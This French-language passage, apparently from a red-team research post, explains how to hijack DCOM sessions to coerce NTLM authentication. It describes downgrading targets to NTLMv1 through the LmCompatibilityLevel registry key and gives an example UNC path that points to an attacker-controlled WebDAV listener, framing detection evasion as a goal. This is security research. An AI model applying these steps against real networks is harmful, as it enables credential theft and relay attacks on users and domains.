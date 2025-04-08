Maintenant que nous savons qu’il est possible de convertir un objet DCOM en un outil de détournement de session, les étapes suivantes consistent à identifier les méthodes et propriétés dont nous pouvons tirer parti pour finaliser le détournement. Dans le cadre de cette recherche, j’ai cherché à savoir si l’on pouvait compromettre l’utilisateur sans exécuter de charge utile, en adoptant une approche différente de celle de la plupart des techniques publiques de déplacement latéral DCOM.

Je souhaitais surtout obtenir des résultats comparables dans un format « sans fichier », ce qui signifie qu’il n’est pas nécessaire de transférer ou d’exécuter une charge utile sur le système cible. Cette distinction est importante, car transférer et exécuter des charges utiles sur un système cible est souvent considéré comme une action « coûteuse » dans les opérations de la Red Team. En évitant cette étape, le risque de déclencher des contrôles de sécurité communs est considérablement réduit. J’ai donc cherché à compromettre les comptes d’utilisateurs distants en imposant une authentification NTLM via DCOM.

La coercition d’authentifications NTLM présente plusieurs avantages principaux par rapport aux techniques traditionnelles de mouvement latéral :

Capturer des hachages NTLMv1/NTLMv2 et tenter de les déchiffrer hors ligne

Relayer les hachages NTLMv1 ou WebDAV NTLMv2 vers d’autres services réseau, tels que LDAP ou SMB, pour effectuer des actions en tant qu’utilisateur concerné

Évitez de transférer et d’exécuter une charge utile sur le système cible, ce qui attire généralement davantage l’attention des outils de sécurité.

Éviter de toucher au processus LSASS, réduisant ainsi les risques de détection.

À l’heure où nous écrivons ces lignes, la signature LDAP et le channel binding ne sont pas requis et appliqués par défaut sur la plupart des contrôleurs de domaine. Ces fonctionnalités de sécurité ne sont obligatoires que sur Windows Server 2025. Cela signifie que si nous pouvons obtenir une authentification NTLMv1 ou WebDAV depuis le système cible, nous pouvons la relayer à LDAP et effectuer des actions en tant qu’utilisateur concerné. De même, la signature SMB n’est pas requise par défaut sur les serveurs Windows, à l’exception des contrôleurs de domaine.

Un autre élément important à prendre en compte est que les hachages NTLMv1 peuvent être trivialement craqués à l’aide de tables arc-en-ciel, qui ont été partagées publiquement par Nic Losby en décembre 2024. Ces tables réduisent considérablement le temps et les efforts nécessaires pour récupérer les identifiants NTLM à partir des hachages NTLMv1. Pour obtenir un hachage NTLMv1 au lieu d’un hachage NTLMv2, nous modifions la clé de registre suivante sur le système cible :

HKLM\System\CurrentControlSet\Control\Lsa\LmCompatibilityLevel

Le fait de définir LmCompatibilityLevel à une valeur inférieure ou égale à 2 oblige le système à revenir à NTLMv1 pour l’authentification. Cette modification est possible avec les privilèges d’administrateur local et est communément appelée « attaque de rétrogradation NetNTLMv1 ».

Alternativement, nous pouvons capturer une authentification WebDAV et la relayer vers LDAP, car les authentifications basées sur HTTP peuvent être transmises à ce service. Si le service WebClient ne fonctionne pas déjà avec un accès privilégié, nous pouvons l’activer à distance sur le système cible. Une fois activé, nous pouvons forcer une authentification WebDAV NTLM vers notre écouteur en spécifiant le nom NetBIOS de la machine dans le chemin UNC. Par exemple :

\\MYHACKERBOX@80\giveme\creds.txt

Pour plus d’informations sur les attaques par relais NTLM et les protocoles qui peuvent être relayés à différents points de terminaison, consultez la ressource suivante ici.